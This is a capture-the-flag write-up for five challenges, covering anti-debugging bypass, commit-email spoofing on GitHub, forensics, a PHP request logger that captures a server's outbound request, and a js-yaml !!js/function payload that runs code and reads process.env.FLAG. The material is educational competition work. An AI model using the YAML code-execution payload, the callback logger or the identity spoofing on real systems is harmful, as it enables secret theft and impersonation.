Bin100

An ELF 64bit binary is provided. It ask for an argv that apparently must match some conditions. Digging into the disassembled code we found out that it has a sort of debugger detection where basically the execution flows drop into an infinite loop. For avoid this break on 0x4011f6 in gdb and set %al to 0x1 so we pass the conditional jump. Now just continue the execution of the program: “Congrats! The flag for this level is : 94958e1c10707728ef965fe850eb98a1”

Misc100

In this challenge we have to commit a file on remote repository and for validating the challenge it must be called as our team name. So we started by creating an account (testaccount12345ASDQWE) and after the registration we change the email of the account to ‘backdooradmin14@gmail.com’ since we have to spoof the e-mail address of the commits that we are going to push (this is requested by the challenge: ‘In order for you to complete this mission, please contact this user https://github.com/backdooradmin14 and ask him to push a commit in this repository with your team name as the commit message.’)

No we have to fork the remote repository ‘backdoorctf2014’ to our local one just by clicking the button here: https://github.com/backdoorctf2014/flag

Now go to our local forked repository: https://github.com/testaccount12345ASDQWE/flag and create a new file: https://github.com/testaccount12345ASDQWE/flag/new/master

naming it as ’tasteless’. Now we have to pull the changes:

https://github.com/testaccount12345ASDQWE/flag/compare/backdoorctf2014:master...master

and then by browsing to the pull request page we’re gonna merge it by clicking “Merge pull request” button:

https://github.com/backdoorctf2014/flag/pull/21

Done, just go the the challenge page take the flag and submit it:

Here is the flag : 5ed763cb33015646a44b0fe1b9d21444

Misc150

Easy challenge over here: extract all the zips, mount the filesystem extracted, open the “#23” file in lost+found directory. It is a sort of .bash_history file where some cmd there but one is interesting: curl http://paste.ubuntu.com/7130279/ . Just go to that paste page and get the flag.

Web100

The challenge provide us a service that rate the images by the URL you paste there. The rate is in range between 1 and 100 and its random every time you hit it. The aim wasn’t to get 100pts as we first thought. We set up on a site that we control a PHP script that logs the requests done on that script:

<?php
$s=implode('---',$_SERVER);
$p=implode('!',$_POST);
echo $s.$p;
file_put_contents('test.txt',$s.$p, FILE_APPEND);
?>

Now go back to the challenge page and paste in the form ‘http://yousire.com/script.php' as URL and you’ll find, once the request has been completed, a file ‘http://yousire.com/test.txt' with some log in took from $_SERVER array and also an interesting filename ‘92702a9381515494689f5d14f85a83b7.php’ . Now go to: http://backdoor.cognizance.org.in/problems/web100-1/92702a9381515494689f5d14f85a83b7.php and there is the flag: f556b9a48a3ee914f291f9b98645cb02 .

Web250

This challenge was a classic example of the YAML RCE vulnerability. Flag was in an environment variable in nodejs: process.env.FLAG . Code used:

---
title: Markdown to HTML Demo
layout: default
foo: "qwe"
tags:
- hello
- world

a: !!js/function >
(function(){ return process.env.FLAG })();


---
##{{a}}

This is normal markdown

This will become **Bold** and _underlined_.

And this is a valid [link][0].

You can use inline variables from the frontmatter as well:

The layout, for eg, is {{layout}} (escaped) or {{{layout}}} (unescaped)

[0]: http://backdoor.cognizance.org.in/

Reference for this vulnerability: http://en.securitylab.ru/poc/445471.php

Razor4x